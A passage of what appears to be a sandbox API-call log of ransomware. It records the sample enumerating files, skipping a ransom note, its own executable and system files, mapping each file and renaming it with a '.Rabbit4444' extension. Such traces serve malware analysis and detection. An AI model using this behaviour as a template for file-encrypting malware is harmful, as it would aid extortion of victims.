returned 1 [0067.839] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98d1f5fb, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98d1f5fb, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x40518d21, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{2E978839-21C5-49A6-AD08-F9DAFC903070}", cAlternateFileName="{2E978~1")) returned 1 [0067.839] lstrcmpiW (lpString1="{2E978839-21C5-49A6-AD08-F9DAFC903070}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.839] lstrcmpiW (lpString1="{2E978839-21C5-49A6-AD08-F9DAFC903070}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.839] lstrcmpiW (lpString1="{2E978839-21C5-49A6-AD08-F9DAFC903070}", lpString2="Rabbit4444.exe") returned -1 [0067.839] lstrcmpiW (lpString1="{2E978839-21C5-49A6-AD08-F9DAFC903070}", lpString2=".") returned 1 [0067.839] lstrcmpiW (lpString1="{2E978839-21C5-49A6-AD08-F9DAFC903070}", lpString2="..") returned 1 [0067.839] lstrcmpiW (lpString1="{2E978839-21C5-49A6-AD08-F9DAFC903070}", lpString2="windows") returned -1 [0067.839] lstrcmpiW (lpString1="{2E978839-21C5-49A6-AD08-F9DAFC903070}", lpString2="bootmgr") returned -1 [0067.839] lstrcmpiW (lpString1="{2E978839-21C5-49A6-AD08-F9DAFC903070}", lpString2="pagefile.sys") returned -1 [0067.839] lstrcmpiW (lpString1="{2E978839-21C5-49A6-AD08-F9DAFC903070}", lpString2="boot") returned -1 [0067.839] lstrcmpiW (lpString1="{2E978839-21C5-49A6-AD08-F9DAFC903070}", lpString2="ids.txt") returned -1 [0067.839] lstrcmpiW (lpString1="{2E978839-21C5-49A6-AD08-F9DAFC903070}", lpString2="NTUSER.DAT") returned -1 [0067.839] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{2E978839-21C5-49A6-AD08-F9DAFC903070}" | out: lpString1="{2E978839-21C5-49A6-AD08-F9DAFC903070}") returned="{2E978839-21C5-49A6-AD08-F9DAFC903070}" [0067.839] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2E978839-21C5-49A6-AD08-F9DAFC903070}", dwFileAttributes=0x0) returned 1 [0067.840] lstrlenW (lpString="{2E978839-21C5-49A6-AD08-F9DAFC903070}") returned 38 [0067.840] lstrlenW (lpString="Rabbit4444") returned 10 [0067.840] lstrcmpiW (lpString1="AFC903070}", lpString2="Rabbit4444") returned -1 [0067.840] lstrlenW (lpString=".dll") returned 4 [0067.840] lstrcmpiW (lpString1="070}", lpString2=".dll") returned 1 [0067.840] lstrlenW (lpString=".lnk") returned 4 [0067.840] lstrcmpiW (lpString1="070}", lpString2=".lnk") returned 1 [0067.840] lstrlenW (lpString=".ini") returned 4 [0067.840] lstrcmpiW (lpString1="070}", lpString2=".ini") returned 1 [0067.840] lstrlenW (lpString=".sys") returned 4 [0067.840] lstrcmpiW (lpString1="070}", lpString2=".sys") returned 1 [0067.840] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2E978839-21C5-49A6-AD08-F9DAFC903070}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{2e978839-21c5-49a6-ad08-f9dafc903070}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.840] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.840] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15915113444) returned 1 [0067.840] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.840] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0067.841] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0067.841] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.842] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0067.843] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0067.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.843] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0067.843] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.843] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0067.843] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15915369587) returned 1 [0067.843] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0067.843] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0067.843] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.843] CloseHandle (hObject=0x29c) returned 1 [0067.843] CloseHandle (hObject=0x280) returned 1 [0067.843] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2E978839-21C5-49A6-AD08-F9DAFC903070}.Rabbit4444") returned 156 [0067.843] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2E978839-21C5-49A6-AD08-F9DAFC903070}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{2e978839-21c5-49a6-ad08-f9dafc903070}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2E978839-21C5-49A6-AD08-F9DAFC903070}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{2e978839-21c5-49a6-ad08-f9dafc903070}.rabbit4444"), dwFlags=0x1) returned 1 [0067.844] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98b7bc11, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98b7bc11, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x41d8710a, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{33305276-2049-4128-AEEC-B9A21214B851}", cAlternateFileName="{33305~1")) returned 1 [0067.845] lstrcmpiW (lpString1="{33305276-2049-4128-AEEC-B9A21214B851}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.845] lstrcmpiW (lpString1="{33305276-2049-4128-AEEC-B9A21214B851}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.845] lstrcmpiW (lpString1="{33305276-2049-4128-AEEC-B9A21214B851}", lpString2="Rabbit4444.exe") returned -1 [0067.845] lstrcmpiW (lpString1="{33305276-2049-4128-AEEC-B9A21214B851}", lpString2=".") returned 1 [0067.845] lstrcmpiW (lpString1="{33305276-2049-4128-AEEC-B9A21214B851}", lpString2="..") returned 1 [0067.845] lstrcmpiW (lpString1="{33305276-2049-4128-AEEC-B9A21214B851}", lpString2="windows") returned -1 [0067.845] lstrcmpiW (lpString1="{33305276-2049-4128-AEEC-B9A21214B851}", lpString2="bootmgr") returned -1 [0067.845] lstrcmpiW (lpString1="{33305276-2049-4128-AEEC-B9A21214B851}", lpString2="pagefile.sys") returned -1 [0067.845] lstrcmpiW (lpString1="{33305276-2049-4128-AEEC-B9A21214B851}", lpString2="boot") returned -1 [0067.845] lstrcmpiW (lpString1="{33305276-2049-4128-AEEC-B9A21214B851}", lpString2="ids.txt") returned -1 [0067.845] lstrcmpiW (lpString1="{33305276-2049-4128-AEEC-B9A21214B851}", lpString2="NTUSER.DAT") returned -1 [0067.845] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{33305276-2049-4128-AEEC-B9A21214B851}" | out: lpString1="{33305276-2049-4128-AEEC-B9A21214B851}") returned="{33305276-2049-4128-AEEC-B9A21214B851}" [0067.845] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{33305276-2049-4128-AEEC-B9A21214B851}", dwFileAttributes=0x0) returned 1 [0067.846] lstrlenW (lpString="{33305276-2049-4128-AEEC-B9A21214B851}") returned 38 [0067.846] lstrlenW (lpString="Rabbit4444") returned 10 [0067.846] lstrcmpiW (lpString1="21214B851}", lpString2="Rabbit4444") returned -1 [0067.846] lstrlenW (lpString=".dll") returned 4 [0067.846] lstrcmpiW (lpString1="851}", lpString2=".dll") returned 1 [0067.846] lstrlenW (lpString=".lnk") returned 4 [0067.846] lstrcmpiW (lpString1="851}", lpString2=".lnk") returned 1 [0067.846] lstrlenW (lpString=".ini") returned 4 [0067.846] lstrcmpiW (lpString1="851}", lpString2=".ini") returned 1 [0067.846] lstrlenW (lpString=".sys") returned 4 [0067.846] lstrcmpiW (lpString1="851}", lpString2=".sys") returned 1 [0067.846] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{33305276-2049-4128-AEEC-B9A21214B851}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{33305276-2049-4128-aeec-b9a21214b851}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.847] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.847] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15915750274) returned 1 [0067.847] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.847] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0067.847] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0067.847] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.848] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0067.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0067.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0067.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0067.849] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15916023106) returned 1 [0067.850] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0067.850] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0067.850] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.850] CloseHandle (hObject=0x29c) returned 1 [0067.850] CloseHandle (hObject=0x280) returned 1 [0067.850] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{33305276-2049-4128-AEEC-B9A21214B851}.Rabbit4444") returned 156 [0067.850] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{33305276-2049-4128-AEEC-B9A21214B851}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{33305276-2049-4128-aeec-b9a21214b851}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{33305276-2049-4128-AEEC-B9A21214B851}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{33305276-2049-4128-aeec-b9a21214b851}.rabbit4444"), dwFlags=0x1) returned 1 [0067.851] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x380416c0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x380416c0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41d8710a, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{3C789AEE-6106-4384-B319-0C96E1E71678}", cAlternateFileName="{3C789~1")) returned 1 [0067.851] lstrcmpiW (lpString1="{3C789AEE-6106-4384-B319-0C96E1E71678}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.851] lstrcmpiW (lpString1="{3C789AEE-6106-4384-B319-0C96E1E71678}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.851] lstrcmpiW (lpString1="{3C789AEE-6106-4384-B319-0C96E1E71678}", lpString2="Rabbit4444.exe") returned -1 [0067.851] lstrcmpiW (lpString1="{3C789AEE-6106-4384-B319-0C96E1E71678}", lpString2=".") returned 1 [0067.851] lstrcmpiW (lpString1="{3C789AEE-6106-4384-B319-0C96E1E71678}", lpString2="..") returned 1 [0067.851] lstrcmpiW (lpString1="{3C789AEE-6106-4384-B319-0C96E1E71678}", lpString2="windows") returned -1 [0067.851] lstrcmpiW (lpString1="{3C789AEE-6106-4384-B319-0C96E1E71678}", lpString2="bootmgr") returned -1 [0067.851] lstrcmpiW (lpString1="{3C789AEE-6106-4384-B319-0C96E1E71678}", lpString2="pagefile.sys") returned -1 [0067.851] lstrcmpiW (lpString1="{3C789AEE-6106-4384-B319-0C96E1E71678}", lpString2="boot") returned -1 [0067.851] lstrcmpiW (lpString1="{3C789AEE-6106-4384-B319-0C96E1E71678}", lpString2="ids.txt") returned -1 [0067.851] lstrcmpiW (lpString1="{3C789AEE-6106-4384-B319-0C96E1E71678}", lpString2="NTUSER.DAT") returned -1 [0067.851] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{3C789AEE-6106-4384-B319-0C96E1E71678}" | out: lpString1="{3C789AEE-6106-4384-B319-0C96E1E71678}") returned="{3C789AEE-6106-4384-B319-0C96E1E71678}" [0067.851] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{3C789AEE-6106-4384-B319-0C96E1E71678}", dwFileAttributes=0x0) returned 1 [0067.851] lstrlenW (lpString="{3C789AEE-6106-4384-B319-0C96E1E71678}") returned 38 [0067.851] lstrlenW (lpString="Rabbit4444") returned 10 [0067.851] lstrcmpiW (lpString1="6E1E71678}", lpString2="Rabbit4444") returned -1 [0067.851] lstrlenW (lpString=".dll") returned 4 [0067.851] lstrcmpiW (lpString1="678}", lpString2=".dll") returned 1 [0067.851] lstrlenW (lpString=".lnk") returned 4 [0067.851] lstrcmpiW (lpString1="678}", lpString2=".lnk") returned 1 [0067.851] lstrlenW (lpString=".ini") returned 4 [0067.851] lstrcmpiW (lpString1="678}", lpString2=".ini") returned 1 [0067.851] lstrlenW (lpString=".sys") returned 4 [0067.851] lstrcmpiW (lpString1="678}", lpString2=".sys") returned 1 [0067.852] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{3C789AEE-6106-4384-B319-0C96E1E71678}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{3c789aee-6106-4384-b319-0c96e1e71678}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.852] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.852] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15916265541) returned 1 [0067.852] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.852] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0067.852] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0067.852] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.853] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0067.855] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.855] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0067.855] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.855] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0067.855] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.855] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0067.855] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15916568699) returned 1 [0067.855] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0067.855] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0067.855] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.855] CloseHandle (hObject=0x29c) returned 1 [0067.855] CloseHandle (hObject=0x280) returned 1 [0067.855] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{3C789AEE-6106-4384-B319-0C96E1E71678}.Rabbit4444") returned 156 [0067.855] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{3C789AEE-6106-4384-B319-0C96E1E71678}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{3c789aee-6106-4384-b319-0c96e1e71678}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{3C789AEE-6106-4384-B319-0C96E1E71678}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{3c789aee-6106-4384-b319-0c96e1e71678}.rabbit4444"), dwFlags=0x1) returned 1 [0067.856] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98bee32e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98bee32e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x41d8710a, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}", cAlternateFileName="{3CE01~1")) returned 1 [0067.856] lstrcmpiW (lpString1="{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.856] lstrcmpiW (lpString1="{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.856] lstrcmpiW (lpString1="{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}", lpString2="Rabbit4444.exe") returned -1 [0067.856] lstrcmpiW (lpString1="{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}", lpString2=".") returned 1 [0067.856] lstrcmpiW (lpString1="{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}", lpString2="..") returned 1 [0067.856] lstrcmpiW (lpString1="{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}", lpString2="windows") returned -1 [0067.856] lstrcmpiW (lpString1="{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}", lpString2="bootmgr") returned -1 [0067.856] lstrcmpiW (lpString1="{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}", lpString2="pagefile.sys") returned -1 [0067.856] lstrcmpiW (lpString1="{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}", lpString2="boot") returned -1 [0067.856] lstrcmpiW (lpString1="{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}", lpString2="ids.txt") returned -1 [0067.856] lstrcmpiW (lpString1="{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}", lpString2="NTUSER.DAT") returned -1 [0067.856] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}" | out: lpString1="{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}") returned="{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}" [0067.856] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}", dwFileAttributes=0x0) returned 1 [0067.857] lstrlenW (lpString="{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}") returned 38 [0067.857] lstrlenW (lpString="Rabbit4444") returned 10 [0067.857] lstrcmpiW (lpString1="A0E563D90}", lpString2="Rabbit4444") returned -1 [0067.857] lstrlenW (lpString=".dll") returned 4 [0067.857] lstrcmpiW (lpString1="D90}", lpString2=".dll") returned 1 [0067.857] lstrlenW (lpString=".lnk") returned 4 [0067.857] lstrcmpiW (lpString1="D90}", lpString2=".lnk") returned 1 [0067.857] lstrlenW (lpString=".ini") returned 4 [0067.857] lstrcmpiW (lpString1="D90}", lpString2=".ini") returned 1 [0067.857] lstrlenW (lpString=".sys") returned 4 [0067.857] lstrcmpiW (lpString1="D90}", lpString2=".sys") returned 1 [0067.857] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{3CE017FD-E6DA-4E49-A4D3-F69A0E563D90}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{3ce017fd-e6da-4e49-a4d3-f69a0e563d90}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.857] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.857] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15916810778) returned 1 [0067.857] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.857] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0067.858] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0067.858] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.859] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.860] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.860] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0067.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.860] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0067.860] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0067.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0067.860] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15917078829) returned 1 [0067.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0067.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 